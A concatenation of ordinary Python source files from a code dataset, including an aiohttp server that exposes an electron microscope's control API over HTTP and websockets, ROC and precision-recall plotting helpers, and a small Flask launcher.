              'rhs': [11], 'rule_id': '000007', 'lift': 1.12613,
              'lhs': [0], 'lhs_cover': [0.888, 222],
              'support': [0.704, 176]}, 'lhs_cover']]
        for example in examples:
            example = dict(zip(headers, example))
            show_method(self, sys._getframe().f_code.co_name, example)
            source_create.i_upload_a_file(
                self, example["data"], shared=example["data"])
            source_create.the_source_is_finished(
                self, example["source_wait"], shared=example["data"])
            dataset_create.i_create_a_dataset(self, shared=example["data"])
            dataset_create.the_dataset_is_finished_in_less_than(
                self, example["dataset_wait"], shared=example["data"])
            association_create.i_create_an_association_with_strategy_from_dataset(
                self, example["strategy"])
            association_create.the_association_is_finished_in_less_than(
                self, example["model_wait"])
            association_create.i_create_a_local_association(self)
            association_create.i_get_rules_for_item_list(
                self, example["item_list"])
            association_create.the_first_rule_is(self, example["JSON_rule"])
| StarcoderdataPython |
76202 | #!/usr/bin/python
from __future__ import division, print_function
# require python 3.5 for aiohttp
import sys
if sys.hexversion < 0x03050000:
sys.exit("Python 3.5 or newer is required to run this program.")
import numpy as np
import json
from io import BytesIO
import asyncio
from aiohttp import web, WSMsgType
from contextlib import suppress
import traceback
class MicroscopeServerWithEvents:
    """
    HTTP/websocket front-end for a Titan microscope.

    Serves the same HTTP API as server.py (GET/PUT requests under
    ``http://<host>:<port>/v1/...``) and additionally polls the current
    state of the microscope, pushing any changes to websocket clients
    connected via ``ws://<host>:<port>/ws/v1``.

    :param microscope: the Microscope to use (either NullMicroscope()
        or Microscope())
    :type microscope: Microscope
    :param host: IP the webserver is running under. Default is "0.0.0.0"
        (run on all interfaces)
    :type host: str
    :param port: Port the webserver is running under. Default is 8080.
    :type port: int
    """

    #: GET endpoints that map 1:1 onto a parameterless ``get_<name>()``
    #: method of the microscope.  Kept as an explicit allowlist so only
    #: published endpoints are reachable over HTTP.
    _SIMPLE_GET_COMMANDS = frozenset((
        "family", "microscope_id", "version", "voltage", "vacuum",
        "stage_holder", "stage_status", "stage_position", "stage_limits",
        "detectors", "image_shift", "beam_shift", "beam_tilt",
        "instrument_mode", "instrument_mode_string", "df_mode",
        "df_mode_string", "projection_sub_mode", "projection_mode",
        "projection_mode_string", "projection_mode_type_string",
        "illumination_mode", "illumination_mode_string",
        "illuminated_area", "condenser_mode", "condenser_mode_string",
        "spot_size_index", "magnification_index", "stem_magnification",
        "indicated_camera_length", "indicated_magnification", "defocus",
        "probe_defocus", "objective_excitation", "intensity",
        "objective_stigmator", "condenser_stigmator", "diffraction_shift",
        "optics_state", "beam_blanked",
        # HT offset supported by StdScript 7.10
        "voltage_offset",
    ))

    #: PUT endpoints that map 1:1 onto ``set_<name>(value)``.
    _SIMPLE_PUT_COMMANDS = frozenset((
        "image_shift", "beam_shift", "beam_tilt", "df_mode",
        "illuminated_area", "projection_mode", "magnification_index",
        "stem_magnification", "defocus", "probe_defocus", "intensity",
        "diffraction_shift", "objective_stigmator", "condenser_stigmator",
        "beam_blanked",
        # HT offset supported by StdScript 7.10
        "voltage_offset",
    ))

    def __init__(self, microscope, host="0.0.0.0", port=8080):
        self.host = host
        self.port = port
        self.microscope = microscope
        print("Configuring web server for host=%s, port=%s" % (self.host, self.port))
        # Last polled microscope state, guarded by its lock.
        self.microscope_state = dict()
        self.microscope_state_lock = asyncio.Lock()
        # Currently connected websocket clients, guarded by their lock.
        self.clients = set()
        self.clients_lock = asyncio.Lock()

    async def http_get_handler_v1(self, request):
        """
        aiohttp handler for GET requests under /v1/.

        :param request: the aiohttp GET request
        :return: the aiohttp response (JSON body; 204 for unsupported
            commands, 404 for expected failures, 500 otherwise)
        """
        command = request.match_info['name']
        parameter = request.rel_url.query
        try:
            response = self.do_GET_V1(command, parameter)
            if response is None:
                # unsupported command: send status 204
                return web.Response(body="Unsupported command {}"
                                    .format(command),
                                    status=204)
            # send JSON response and (default) status 200
            encoded_response = ArrayJSONEncoder()\
                .encode(response).encode("utf-8")
            return web.Response(body=encoded_response,
                                content_type="application/json")
        except MicroscopeException as e:
            # expected failure (unknown endpoint, bad parameter, ...)
            # BUGFIX: aiohttp requires str/bytes for the body; passing
            # the exception instance itself raised a TypeError.
            return web.Response(body=str(e), status=404)
        except Exception as e:
            # anything else is an internal server error
            return web.Response(body=str(e), status=500)

    def do_GET_V1(self, command, parameter):
        """
        Execute a V1 GET command against the microscope.

        :param command: endpoint name, e.g. ``"voltage"``, ``"acquire"``
            or ``"detector_param/<name>"``
        :param parameter: query parameters (only used by ``"acquire"``,
            which expects a ``detectors`` entry)
        :return: the JSON-serializable command result
        :raises MicroscopeException: for unknown endpoints/detectors or
            missing parameters
        """
        if command in self._SIMPLE_GET_COMMANDS:
            # 1:1 mapping onto the microscope's get_<command>() method.
            response = getattr(self.microscope, "get_" + command)()
        elif command.startswith("detector_param/"):
            name = command[len("detector_param/"):]
            try:
                response = self.microscope.get_detector_param(name)
            except KeyError:
                raise MicroscopeException('Unknown detector: %s' % command)
        elif command == "acquire":
            try:
                detectors = parameter["detectors"]
            except KeyError:
                raise MicroscopeException('No detectors: %s' % command)
            response = self.microscope.acquire(*detectors)
        else:
            raise MicroscopeException('Unknown endpoint: %s' % command)
        print('Returning response %s for command %s...' % (response, command))
        return response

    async def http_put_handler_v1(self, request):
        """
        aiohttp handler for PUT requests under /v1/.

        :param request: the aiohttp PUT request (JSON body, max 4096 bytes)
        :return: the aiohttp response
        """
        command = request.match_info['name']
        # BUGFIX: use .get() -- a request without a Content-Length header
        # must not raise KeyError here.
        content_length = request.headers.get('content-length')
        if content_length is not None and int(content_length) > 4096:
            raise ValueError("Too much content...")
        try:
            # get JSON content
            text_content = await request.text()
            json_content = json.loads(text_content)
            response = self.do_PUT_V1(command, json_content)
            if response is None:
                # NOTE: most PUT commands return no value, so successful
                # PUTs are answered with 204 and this text; kept as-is
                # for backward compatibility with existing clients.
                return web.Response(body="Unsupported command {}"
                                    .format(command),
                                    status=204)
            # send JSON response and (default) status 200
            encoded_response = ArrayJSONEncoder()\
                .encode(response).encode("utf-8")
            return web.Response(body=encoded_response,
                                content_type="application/json")
        except MicroscopeException as e:
            # BUGFIX: body must be str/bytes, not the exception instance.
            return web.Response(body=str(e), status=404)
        except Exception as e:
            return web.Response(body=str(e), status=500)

    def do_PUT_V1(self, command, json_content):
        """
        Execute a V1 PUT command against the microscope.

        :param command: the PUT endpoint name
        :param json_content: the decoded JSON value to set
        :return: the command result (None for most commands)
        :raises MicroscopeException: for unknown endpoints/detectors/modes
        """
        response = None
        if command == "stage_position":
            method = json_content.get("method", "GO")
            # Only forward recognized stage axes (plus optional speed).
            pos = dict((k, json_content[k]) for k in json_content.keys()
                       if k in self.microscope.STAGE_AXES)
            if "speed" in json_content:
                pos['speed'] = json_content['speed']
            self.microscope.set_stage_position(pos, method=method)
        elif command in self._SIMPLE_PUT_COMMANDS:
            # 1:1 mapping onto the microscope's set_<command>() method.
            getattr(self.microscope, "set_" + command)(json_content)
        elif command.startswith("detector_param/"):
            name = command[len("detector_param/"):]
            try:
                response = self.microscope.set_detector_param(name, json_content)
            except KeyError:
                raise MicroscopeException('Unknown detector: %s' % command)
        elif command == "normalize":
            mode = json_content
            try:
                self.microscope.normalize(mode)
            except ValueError:
                raise MicroscopeException('Unknown mode: %s' % mode)
        else:
            raise MicroscopeException('Unknown endpoint: %s' % command)
        return response

    async def websocket_handler_v1(self, request):
        """
        aiohttp handler for websocket connections under /ws/v1.

        Registers the client (which also receives the current state),
        then consumes messages until the connection terminates and
        unregisters the client.

        :param request: the connection request
        :return: the websocket response
        """
        print('Websocket client session opened.')
        # available options for WebSocketResponse client session:
        # autoping=True (default), heartbeat=5 (necessary for pings)
        # receive_timeout=10
        ws = web.WebSocketResponse()
        remote_ip = request.remote
        print('Websocket handler for IP %s created.' % remote_ip)
        await ws.prepare(request)
        # register client (also pushes the current microscope state)
        await self.add_websocket_client(ws)
        try:
            async for msg in ws:
                if msg.type == WSMsgType.TEXT:
                    # Any text message closes the session; only 'close'
                    # is an expected payload.
                    if msg.data != 'close':
                        print('websocket connection received unsupported text message: "%s"' % msg.data)
                    await ws.close()
                elif msg.type == WSMsgType.PING:
                    pass
                elif msg.type == WSMsgType.PONG:
                    pass
                elif msg.type == WSMsgType.ERROR:
                    await self.remove_websocket_client(ws)
                    print('websocket connection closed with exception %s' %
                          ws.exception())
                    await ws.close()
                else:
                    print('Received unsupported websocket message type "%s": closing connection' % msg.type)
                    await ws.close()
        finally:
            print('Websocket client session closed for IP %s' % remote_ip)
            await ws.close()
            await self.remove_websocket_client(ws)
        return ws

    async def add_websocket_client(self, ws):
        """Register a websocket client and send it the current state."""
        async with self.clients_lock:
            print('number of clients before adding new client: %s ' %
                  len(self.clients))
            self.clients.add(ws)
            print('number of clients after adding new client: %s ' %
                  len(self.clients))
        async with self.microscope_state_lock:
            if self.microscope_state:
                print('Sending microscope state to new client.')
                await ws.send_json(self.microscope_state)

    async def remove_websocket_client(self, ws):
        """Unregister a websocket client (idempotent)."""
        async with self.clients_lock:
            print("number of clients before removing client: %s " %
                  len(self.clients))
            # BUGFIX: discard() instead of remove() -- the client may be
            # unregistered twice (ERROR branch plus the handler's finally
            # block), which previously raised KeyError.
            self.clients.discard(ws)
            print("number of clients after removing client: %s " %
                  len(self.clients))

    async def broadcast_to_websocket_clients(self, obj):
        """
        Converts obj to JSON string and sends the string to all connected
        websocket clients.

        :param obj: JSON-serializable object
        """
        async with self.clients_lock:
            for ws in self.clients:
                await ws.send_json(obj)

    async def change_microscope_state(self, new_values):
        """
        Merge ``new_values`` into the cached microscope state and
        broadcast every entry that is new or whose value changed.

        :param new_values: dict mapping command name -> latest result
        :type new_values: dict
        """
        changes = dict()
        async with self.microscope_state_lock:
            for command, new_result in new_values.items():
                # Record commands that are unseen or whose value differs.
                if (command not in self.microscope_state
                        or self.microscope_state[command] != new_result):
                    changes[command] = new_result
                    self.microscope_state[command] = new_result
        if changes:
            print("changes=%s" % changes)
            await self.broadcast_to_websocket_clients(changes)

    def reset_microscope_state(self):
        """Forget the cached state so the next poll broadcasts everything."""
        self.microscope_state = dict()

    def run_server(self):
        """Build the aiohttp application, register routes and run it
        (this call blocks until the server shuts down)."""
        print("Starting web server with events under host=%s, port=%s" % (self.host, self.port))
        app = web.Application()
        # add routes for
        # - HTTP-GET/PUT, e.g. http://127.0.0.1:8080/v1/projection_mode
        # - websocket connection ws://127.0.0.1:8080/ws/v1
        app.add_routes([web.get('/ws/v1', self.websocket_handler_v1),
                        web.get(r'/v1/{name:.+}', self.http_get_handler_v1),
                        web.put(r'/v1/{name:.+}', self.http_put_handler_v1),
                        ])
        web.run_app(app, host=self.host, port=self.port)
class MicroscopeException(Exception):
    """
    Raised by the V1 command dispatchers for expected failures (unknown
    endpoint, unknown detector, bad parameter).  The HTTP handlers
    translate it into an error response with status 404.

    (The previous docstring claimed status 204, which is actually the
    status used for a None command result, not for this exception.)
    """
    # The pass-through __init__ was redundant; Exception's constructor
    # already accepts arbitrary positional/keyword arguments.
class ArrayJSONEncoder(json.JSONEncoder):
    """JSON encoder that serializes 2D numpy arrays of common numeric
    dtypes as base64-encoded blobs with shape/type/endianness metadata."""

    # Upper-case numpy dtype names that may be serialized; anything else
    # falls through to the base class (which raises TypeError).
    allowed_dtypes = {"INT8", "INT16", "INT32", "INT64", "UINT8", "UINT16", "UINT32", "UINT64", "FLOAT32", "FLOAT64"}

    def default(self, obj):
        if not isinstance(obj, np.ndarray):
            return json.JSONEncoder.default(self, obj)
        import sys, base64
        type_name = obj.dtype.name.upper()
        if type_name not in self.allowed_dtypes:
            return json.JSONEncoder.default(self, obj)
        # Resolve '<'/'>' markers; native/irrelevant order ('=' or '|')
        # is reported as the host byte order.
        marker = obj.dtype.byteorder
        if marker == '<':
            endianness = "LITTLE"
        elif marker == '>':
            endianness = "BIG"
        else:
            endianness = sys.byteorder.upper()
        height, width = obj.shape[0], obj.shape[1]
        return {
            'width': width,
            'height': height,
            'type': type_name,
            'endianness': endianness,
            'encoding': "BASE64",
            'data': base64.b64encode(obj).decode("ascii"),
        }
def _gzipencode(content):
"""GZIP encode bytes object"""
import gzip
out = BytesIO()
f = gzip.GzipFile(fileobj=out, mode='w', compresslevel=5)
f.write(content)
f.close()
return out.getvalue()
def _parse_enum(type, item):
"""Try to parse 'item' (string or integer) to enum 'type'"""
try:
return type[item]
except:
return type(item)
class MicroscopeEventPublisher:
    """
    Periodically polls the microscope for a number of state values and
    forwards the results to the server's microscope state (which in turn
    broadcasts any changes to connected websocket clients).

    :param microscope_server: The server instance
    :param sleep_time: The sleeping time (seconds) between polling calls.
    :param polling_config: A configuration dict mapping a GET command
        name to a tuple of (conversion callable, scaling factor).
    """

    def __init__(self, microscope_server,
                 sleep_time, polling_config):
        self.microscope_server = microscope_server
        self.sleep_time = sleep_time
        self.polling_config = polling_config
        # the microscope state representation (currently informational)
        self.microscope_state = dict()
        # the coroutine function used for polling periodically
        self.polling_func = self.check_for_microscope_changes
        self.is_started = False
        self._task = None

    def start(self):
        """Start periodic polling (no-op if already started)."""
        # reset cached state so clients receive a full snapshot again
        self.microscope_server.reset_microscope_state()
        if not self.is_started:
            self.is_started = True
            # Start task to call the polling function periodically:
            self._task = asyncio.ensure_future(self._run())

    def stop(self):
        """Stop periodic polling (no-op if not started)."""
        # reset cached state
        self.microscope_server.reset_microscope_state()
        if self.is_started:
            self.is_started = False
            # NOTE: the task is cancelled but not awaited here; the
            # cancellation is delivered on the next event-loop iteration.
            self._task.cancel()

    async def _run(self):
        """Polling loop: sleep, then poll -- forever (until cancelled)."""
        while True:
            # sleep as configured for the instance
            await asyncio.sleep(self.sleep_time)
            # call polling function
            await self.polling_func()

    async def check_for_microscope_changes(self):
        """Poll every configured GET command once and push the converted
        results to the server, which broadcasts any changes."""
        try:
            all_results = dict()
            for get_command in self.polling_config:
                try:
                    # execute the parameterless GET command against the
                    # server's V1 dispatcher
                    result_raw = self.microscope_server.do_GET_V1(get_command,
                                                                  None)
                    casting_func = self.polling_config[get_command][0]
                    all_results[get_command] = casting_func(result_raw)
                except Exception as exc:
                    # BUGFIX: the original mixed a '{}' placeholder with
                    # %-formatting and passed a 2-tuple to a single '%s',
                    # raising TypeError whenever a poll failed.
                    print("TEMScripting method '%s' failed "
                          "while polling: %s" % (get_command, exc))
            await self.microscope_server.change_microscope_state(all_results)
        except Exception as exc:
            traceback.print_exc()
            print("Polling failed: %s" % exc)
if __name__ == '__main__':
    # Entry point: run the event-publishing microscope server on all
    # interfaces, port 8080.
    host="0.0.0.0"
    port=8080
    # define all TEMScripting methods which should be polled
    # during one polling event via the web server.
    # value is a tuple consisting of a conversion method
    # (e.g. "float()") and a scaling factor (for int/float)
    # for the result of the method
    tem_scripting_method_config = {
        # for meta data key 'condenser.mode'
        "instrument_mode_string": (str, 1),     # "TEM"/"STEM"
        "illumination_mode": (int, 1),          # e.g., 0 ("NANOPROBE"), 1: ("MICROPROBE")
        "df_mode_string": (str, 1),             # e.g., "CARTESIAN", "OFF"
        "spot_size_index": (int, 1),            # e.g., 3
        "condenser_mode_string": (str, 1),      # e.g., "PROBE"
        "beam_blanked": (bool, 1),              # True, False
        # for meta data key 'electron_gun.voltage'
        "voltage": (float, 1),                  # e.g., "200"
        # for meta data key "objective.mode -> projector.camera_length"
        "indicated_camera_length": (int, 1),    # e.g., "0", in meters (?)
        # for meta data key "objective.mode -> projector.magnification"
        "indicated_magnification": (float, 1),  # e.g., 200000.0
        # for meta data key "objective.mode -> projector.mode"
        "projection_mode_string": (str, 1),     # e.g., "SA"
        "projection_mode_type_string": (str, 1),# e.g., "IMAGING"
        # for meta data key "objective.mode -> scan_driver.magnification"
        "stem_magnification": (float, 1),       # e.g., "6000"
    }
    # NOTE(review): this relative import only works when the module is
    # executed as part of its package (python -m ...), not as a plain
    # script -- confirm the intended invocation.
    from .microscope import Microscope
    microscope = Microscope()
    server = MicroscopeServerWithEvents(microscope=microscope,
                                        host=host, port=port)
    # poll the microscope once per second
    microscope_event_publisher = MicroscopeEventPublisher(server, 1.0,
                                                          tem_scripting_method_config)
    try:
        microscope_event_publisher.start()
        server.run_server()
    finally:
        # always stop the polling task, even if the server crashes
        microscope_event_publisher.stop()
| StarcoderdataPython |
9660995 | import os, logging
import numpy as np
import matplotlib.pyplot as plt
from scipy import interp
from textwrap import wrap
from sklearn.metrics import precision_recall_curve, average_precision_score, auc
logger = logging.getLogger('eyegaze')
class VisdomLinePlotter(object):
    """Streams scalar metrics to a Visdom server, one window per
    variable, with one line per split."""

    def __init__(self, server, env_name='main'):
        # Visdom connection, target environment, and the per-variable
        # window handles created so far.
        self.viz = server
        self.env = env_name
        self.plots = {}

    def plot(self, var_name, split_name, title_name, x, y):
        """Append the point (x, y) to the line of ``split_name`` in the
        window of ``var_name``, creating the window on first use."""
        if var_name not in self.plots:
            # First point for this variable: open a new window.  The
            # point is duplicated because a line needs two samples.
            window_opts = dict(
                legend=[split_name],
                title=title_name,
                xlabel='Iterations',
                ylabel=var_name,
            )
            self.plots[var_name] = self.viz.line(
                X=np.array([x, x]), Y=np.array([y, y]),
                env=self.env, opts=window_opts)
        else:
            self.viz.line(X=np.array([x]), Y=np.array([y]),
                          env=self.env, win=self.plots[var_name],
                          name=split_name, update='append')
def get_cmap(n, name='Set1'):
    """Return a callable mapping each index in 0..n-1 to a distinct RGB color.

    Adapted from: https://stackoverflow.com/questions/14720331/how-to-generate-random-colors-in-matplotlib
    Colormap names: https://matplotlib.org/tutorials/colors/colormaps.html

    :param n: Number of classes (number of distinct colors needed).
    :param name: A standard matplotlib colormap name to sample from.
    :return: a discretized colormap with ``n`` bins, usable as a
        function from index to RGB color.
    """
    cmap = plt.cm.get_cmap(name, n)
    return cmap
def plot_roc_curve(tpr, fpr, class_names, aurocs, filename, name_variable):
    """Plot per-class ROC curves plus their interpolated macro-average.

    Modified from the scikit-learn multi-class ROC example. Classes with no
    entry in ``fpr`` (e.g. absent from the evaluation set) are skipped with
    a warning and excluded from the average.

    Side effect: an ``"all_val"`` entry (the common FPR grid and averaged
    TPR) is added to both the ``fpr`` and ``tpr`` dicts passed in.

    :param tpr: dict, class index -> true-positive-rate array
    :param fpr: dict, class index -> false-positive-rate array
    :param class_names: class names, indexed consistently with tpr/fpr
    :param aurocs: dict, class index -> precomputed AUROC for that class
    :param filename: the output directory where the file should be written
    :param name_variable: the filename with the extension
    :return: None (writes the figure to disk)
    """
    n_classes = len(class_names)

    # Collect the FPR grid of every class that was actually evaluated.
    per_class_fpr = []
    for i in range(n_classes):
        if i in fpr:
            # expand_dims + concatenate flattens fpr[i] to 1-D even when it
            # arrives as a scalar-per-row column (np.concatenate alone
            # rejects zero-dimensional inputs).
            per_class_fpr.append(np.concatenate(np.expand_dims(fpr[i], axis=1)))
        else:
            logger.info('--' * 30)
            logger.info(f"WARNING!!! No: {class_names[i]} found in the set ")
            logger.info('--' * 30)

    # Merge all per-class grids into one sorted, de-duplicated FPR grid.
    flat_values = [value for grid in per_class_fpr for value in grid]
    all_fpr = np.unique(np.asarray(flat_values))

    # Interpolate each available curve onto the common grid and average.
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(n_classes):
        if i in fpr:
            mean_tpr += interp(all_fpr, fpr[i], tpr[i])
    # Divide by the number of classes actually present, not n_classes,
    # so missing classes do not drag the average down.
    mean_tpr /= len(per_class_fpr)

    fpr["all_val"] = all_fpr
    tpr["all_val"] = mean_tpr
    roc_auc = auc(fpr["all_val"], tpr["all_val"])

    lw = 2
    fig = plt.figure()
    fig.subplots_adjust(bottom=0.25)
    ax = fig.add_subplot(111)
    if n_classes > 1:
        ax.plot(fpr["all_val"], tpr["all_val"],
                label='average ROC(area = {0:0.2f})'
                      ''.format(roc_auc),
                color='navy', linestyle=':', linewidth=4)
    colors = get_cmap(n_classes)
    for i in range(n_classes):
        if i in fpr:
            ax.plot(fpr[i], tpr[i], color=colors(i), lw=lw,
                    label='{0} (area = {1:0.2f})'
                          ''.format(class_names[i], aurocs[i]))
    # Chance diagonal (random classifier reference).
    ax.plot([0, 1], [0, 1], 'k--', lw=lw)
    ax.set_xlim([0.0, 1.0])
    ax.set_ylim([0.0, 1.05])
    ax.set_xlabel('False Positive Rate (FPR/Fallout)')
    ax.set_ylabel('True Positive Rate (TPR/Sensitivity)')
    ax.set_title("\n".join(wrap(f'{name_variable}')))
    # Put the legend to the right of the current axis.
    ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
    # Minor ticks must be on for the minor grid to render.
    ax.minorticks_on()
    ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
    ax.grid(which='minor', linestyle='solid', linewidth='0.25', color='black')
    fig.savefig(os.path.join(filename, 'ROC_' + name_variable), bbox_inches='tight')
    # Close the figure and clear the axis to free memory.
    plt.cla()
    plt.close()
def plot_precision_recall(y, y_hat, class_names, filename, name_variable):
    """
    From Scikit example. Plots the precision-recall for multiple classes,
    with iso-F1 reference curves and a micro-averaged curve when there is
    more than one class.

    :param y: Ground truth labels (converted to an ndarray; indexed per
        class via ``Y_test[i]`` — see NOTE below on the expected layout)
    :param y_hat: Model predicted scores, same layout as ``y``
    :param class_names: names of the classes, one per curve
    :param filename: the output directory where the file should be written
    :param name_variable: the filename with the extension.
    :return: None (file gets written to disk)
    """
    Y_test = np.asarray(y)
    y_score = np.asarray(y_hat)
    # For each class
    precision = dict()
    recall = dict()
    average_precision = dict()
    n_classes = len(class_names)
    for i in range(n_classes):
        # NOTE(review): Y_test[i] selects ROW i. If Y_test is laid out as
        # (n_samples, n_classes) this should be Y_test[:, i] — confirm the
        # layout produced by the caller before relying on per-class curves.
        precision[i], recall[i], _ = precision_recall_curve(Y_test[i],
                                                            y_score[i])
        average_precision[i] = average_precision_score(Y_test[i], y_score[i])
    # A "micro-average": quantifying score on all classes jointly
    precision["micro"], recall["micro"], _ = precision_recall_curve(Y_test.ravel(),
                                                                    y_score.ravel())
    average_precision["micro"] = average_precision_score(Y_test, y_score,
                                                         average="micro")
    logger.info('Average precision score, micro-averaged over all classes: {0:0.2f}'
                .format(average_precision["micro"]))
    # setup plot details
    colors = get_cmap(n_classes)
    # plt.figure(figsize=(7, 8))
    plt.figure()
    # Draw gray iso-F1 contours (curves of constant F1 score) as a visual
    # reference behind the precision-recall curves.
    f_scores = np.linspace(0.2, 0.8, num=4)
    lines = []
    labels = []
    for f_score in f_scores:
        x = np.linspace(0.01, 1)
        # Solve F1 = 2*p*r/(p+r) for precision given recall x.
        y = f_score * x / (2 * x - f_score)
        l, = plt.plot(x[y >= 0], y[y >= 0], color='gray', alpha=0.2)
        # y[45] places the annotation near the right edge of the default
        # 50-point linspace grid.
        plt.annotate('f1={0:0.1f}'.format(f_score), xy=(0.9, y[45] + 0.02))
        lines.append(l)
    if n_classes > 1:
        labels.append('iso-f1 curves')
        l, = plt.plot(recall["micro"], precision["micro"], color='gold', lw=2)
        lines.append(l)
        labels.append('micro-average Precision-recall (area = {0:0.2f})'
                      ''.format(average_precision["micro"]))
    for i in range(n_classes):
        l, = plt.plot(recall[i], precision[i], color=colors(i), lw=2)
        lines.append(l)
        labels.append('{0} (area = {1:0.2f})'
                      ''.format(class_names[i], average_precision[i]))
    fig = plt.gcf()
    fig.subplots_adjust(bottom=0.25)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('Recall')
    plt.ylabel('Precision')
    plt.title("\n".join(wrap(f'Precision-Recall -- {name_variable}')))
    # Put a legend to the right of the current axis
    plt.legend(lines, labels, loc='center left', bbox_to_anchor=(1, 0.5))
    # Turn on the minor TICKS, which are required for the minor GRID
    plt.minorticks_on()
    # Customize the major grid
    plt.savefig(os.path.join(filename,"Precision-Recall_"+name_variable), bbox_inches='tight')
    # --- Close the figure and clear up the axis to free memory.
    plt.cla()
    plt.close()
| StarcoderdataPython |
1845136 | from app import create_app
from config.app_config import LocalConfig
if __name__ == '__main__':
    # Build the application from the local configuration and launch it
    # with whatever RUN_SETTINGS that config provides (host/port/debug...).
    flask_app = create_app(LocalConfig)
    run_settings = flask_app.config['RUN_SETTINGS']
    flask_app.run(**run_settings)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.